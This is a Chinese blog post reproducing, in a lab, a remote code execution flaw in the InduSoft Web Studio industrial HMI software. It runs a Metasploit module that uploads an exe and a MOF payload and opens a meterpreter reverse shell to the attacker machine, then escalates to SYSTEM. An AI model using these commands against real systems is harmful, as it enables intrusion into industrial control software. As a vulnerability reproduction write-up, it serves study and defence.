嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

admin 2024年12月18日22:41:14评论32 views字数 3187阅读10分37秒阅读模式
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

点击上方蓝字关注我们

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

WaP9安全搬砖客的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

WaP9安全搬砖客拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

1. 环境配置

1.1 环境准备

闲着没事来复现一个2011年的工控CVE漏洞,其实还是偏向于web.

再来熟悉一下HMI和SCADA吧

靶机:win xp (192.168.183.160)

攻击机器:kali(192.168.183.139)

工业软件及版本:InduSoft Web Studio v7.1  

漏洞exp:https://www.exploit-db.com/exploits/21837

1.2 工业软件安装

安装地址:https://indusoft-web-studio.software.informer.com/7.1/

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

然后过程可参考:http://www.opdown.com/soft/92899.html

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

在靶机中安装InduSoft Web Studio v7.1工业软件,安装好后点击remote agent,然后点start

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

然后就来到了主页面嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

此人机界面继承了许多存在的工业场景,比如是由燃气采集

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

然后还有自动化机械臂

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

还有风能监测,并且还登记了操作系统和用户,作为十年前的软件做的确实可以

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

然后我们此时查看端口占用情况

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现 同时可以看到4322端口已开启  

1.3 子弹上膛

在kali攻击中,如下目录放入下载的exp模块  

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

然后下载此攻击exp

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

此脚本在更新后的msf上是存在的,没有的安装一下

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

通过https://www.exploit-db.com/exploits/21837,获取漏洞exp,发现漏洞测试版本为InduSoft Web Studio v6.1 SP6,由于v6.1版本已经很难找到,本文尝试使用InduSoft Web Studio v7.1版本代替,亲测v7.1版本也是ok的

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

通过exp发现漏洞利用需要通过4322端口,故InduSoft Web Studio v7.1需要开启相应服务。

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

2. 漏洞复现

2.1 msf反弹shell

msf6 > use exploit/windows/scada/indusoft_webstudio_exec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcpmsf6 exploit(windows/scada/indusoft_webstudio_exec) > optionsModule options (exploit/windows/scada/indusoft_webstudio_exec):   Name    Current Setting  Required  Description   ----    ---------------  --------  -----------   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'   RPORT   4322             yes       The target port (TCP)Payload options (windows/meterpreter/reverse_tcp):   Name      Current Setting  Required  Description   ----      ---------------  --------  -----------   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)   LHOST     192.168.183.139      yes       The listen address (an interface may be specified)   LPORT     7777             yes       The listen portExploit target:   Id  Name   --  ----   0   Windows XP / 2003msf6 exploit(windows/scada/indusoft_webstudio_exec) > run[*] Started reverse TCP handler on 192.168.183.139:7777 [*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the exe payload to C:WINDOWSsystem32cBlTPNrXsabYq.exe[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The exe payload has been uploaded successfully[*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the mof file to c:WINDOWSsystem32wbemmofLUivMnxSNqx.mof[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The mof file has been uploaded successfully[*] Exploit completed, but no session was created.

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

这里需要开启一下,然后就可以进行提权操作了

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

输入shell就可以执行命令了,到这里提权成功

meterpreter > getsystem                                                                                                                                                                                                                      ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).                                                                                                                                                                  meterpreter > getuid                                                                                                                                                                                                                         Server username: NT AUTHORITYSYSTEM                                                                                                                                                                                                         meterpreter > shellProcess 2204 created.                                                                                                                                                                                                                        Channel 1 created.                                                                                                                                                                                                                           Microsoft Windows XP [�汾 5.1.2600]                                                                                                                                                                                                          (C) ��Ȩ���� 1985-2001 Microsoft Corp.                                                                                                                                                                                                        C:WINDOWSsystem32>

参考链接:https://www.freebuf.com/articles/ics-articles/256862.html

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

新书推荐

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
GO语言区块链应用开发从入门到精通》全面地介绍了Go语言区块链应用工程师所需要的基础知识和各种技术,主要分为基础篇、进阶篇和实战篇三部分。全书共7章,其中12章为基础篇,介绍Go语言环境安装、基础语法、函数编程、容器编程、面向对象编程、并发编程以及网络编程;35章为进阶篇,第3章介绍区块链基本原理、发展历程、行业应用案例,第4章主要介绍智能合约,包括solidity基础语法,多个经典案例,以及Go语言如何调用智能合约,第5章主要介绍区块链原理的程序化实践,包括Go语言实现Base58编码、P2P网络、PoW共识、区块链组块以及UTXO账户模型实现;67章为实战篇,介绍2个实战项目,第6章介绍如何实现Go语言版的区块链钱包项目,内容包括助记词生成、私钥存储、Coin交易以及Token交易等内容,第7章介绍如何实现一个版权交易系统,内容包含如何去设计区块链应用系统、后端功能如何与区块链相结合,它既是一个区块链系统应用项目,也是一个Go语言Web服务器项目。GO语言区块链应用开发从入门到精通》适合想从事GO语言区块链开发的程序员及GO语言爱好者阅读。

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

点击上方链接,更多优惠等你哦~

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

扫码关注“WaP9安全搬砖客”公众号,持续更新文章

嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

WaP9安全搬砖客

原文始发于微信公众号(乌鸦安全):嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日22:41:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现https://cn-sec.com/archives/702270.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息